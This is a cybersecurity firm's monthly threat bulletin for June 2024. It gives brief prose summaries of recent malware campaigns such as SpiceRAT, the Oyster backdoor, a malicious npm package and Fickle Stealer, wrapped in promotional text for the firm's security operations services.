X
NEXT
Forgot password?

DigitalXRAID

Threat Pulse – June 2024

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats. 

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the largest Open Threat Exchange database available. 

Unveiling SpiceRAT: The latest tool targeting EMEA and Asia 

Researchers have discovered a new remote access trojan (RAT) dubbed SpiceRAT, employed by the threat actor SneakyChef in a recent malicious campaign.  

The campaign targeted government agencies across multiple countries in Europe, the Middle East, Africa, and Asia. SpiceRAT was delivered alongside SugarGh0st malware through phishing emails with RAR attachments containing LNK or HTA files as initial vectors.  

SpiceRAT utilises sideloading techniques, leveraging legitimate executables to load malicious components. It gathers system reconnaissance data, communicates with command-and-control servers, and can download additional plugins to expand its capabilities.  

Malvertising Campaign Leads to Execution of Oyster Backdoor 

Researchers have observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.  

The installers were being used to drop a backdoor identified as Oyster, aka Broomstick.  

Following execution of the backdoor, we have observed enumeration commands indicative of hands-on-keyboard activity as well as the deployment of additional payloads. 

Info Stealing Campaign Uses DLL Sideloading Through Legitimate Cisco Webex’s Binaries for Initial Execution and Defence Evasion 

Researchers uncovered a sophisticated and evasive attack campaign targeting users in Latin America and Asia Pacific through trojanised copies of the Cisco Webex Meetings App.  

This campaign employed a stealthy malware loader, known as HijackLoader, and an information-stealing module identified as Vidar Stealer, to siphon off credentials and sensitive data undetected by leveraging legitimate processes.  

GrimResource – Microsoft Management Console for initial access and evasion 

Researchers uncovered a novel, in-the-wild code execution technique leveraging specially crafted MSC files referred to as GrimResource.  

GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (mmc.exe) with minimal security warnings, ideal for gaining initial access and evading defences.  

New InnoSetup Malware Created Upon Each Download Attempt 

Researchers have discovered a new malware distribution technique where malicious code is dynamically generated for each download attempt, evading detection through unique hash values.  

The malware, termed ‘InnoLoader‘, disguises itself as legitimate software installers, executing a complex sequence of downloading and executing additional payloads, including information stealers, adware, and malicious browser plugins.  

It employs evasion tactics like varying C2 responses and downloading benign files to hinder analysis.  

Malicious npm package targets AWS users 

Researchers discovered a malicious package named legacyreact-aws-s3-typescript on the npm repository.  

It mimicked a popular legitimate package, react-aws-s3-typescript, designed to facilitate file uploads to Amazon S3 Buckets.  

Initially, the package appeared benign, but a later version included a postinstall script that downloaded and executed a backdoor payload. The package’s history demonstrates the challenges of monitoring open source repositories for threats.  

Attackers Exploiting Public Cobalt Strike Profiles 

This report discusses recent findings of malicious Cobalt Strike infrastructure and malicious Cobalt Strike samples that leverage publicly available Malleable C2 profiles for evasion.  

Despite its defensive cybersecurity use, threat actors continue exploiting Cobalt Strike’s malleable and evasive nature, posing a significant threat.  

The analysis also emphasises the adaptability of attackers in modifying public profiles to evade detection, highlighting the arms race against evolving threats.  

P2PInfect botnet targets REdis servers with new ransomware module 

The peer-to-peer malware botnet known as P2PInfect has been found targeting misconfigured Redis servers with ransomware and cryptocurrency miners.  

The development marks the threat’s transition from what appeared to be a dormant botnet with unclear motives to a financially motivated operation.  

It typically spreads by targeting Redis servers and its replication feature to transform victim systems into a follower node of the attacker-controlled server, subsequently allowing the threat actor to issue arbitrary commands to them. 

The Rust-based worm also features the ability to scan the internet for more vulnerable servers, not to mention incorporating an SSH (Secure Shell) password sprayer module that attempts to log in using common passwords.  

Fickle Stealer Distributed via Multiple Attack Chain 

A new Rust-based information stealer malware called Fickle Stealer has been observed being delivered via multiple attack chains with the goal of harvesting sensitive information from compromised hosts.  

Industry specialists are aware of four different distribution methods — namely VBA dropper, VBA downloader, link downloader, and executable downloader — with some of them using a PowerShell script to bypass User Account Control (UAC) and execute Fickle Stealer.  

The stealer targets crypto wallets, web browsers, AnyDesk, Discord, Steam, Filezilla, Skype and Telegram. It also periodically sends information about the victim, including country, city, IP address, operating system version, computer name, and username to a Telegram bot controlled by the attacker. 

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, whilst you take care of business.    

Talk to the team to see how you can start protecting your business against cyberattacks today. 

Protect Your Business & Your Reputation.

With a continued focus on security, you can rest assured that breaches and exploits won't be holding you back.

Speak To An Expert

x

Get In Touch

[contact-form-7 id="5" title="Contact Us Form"]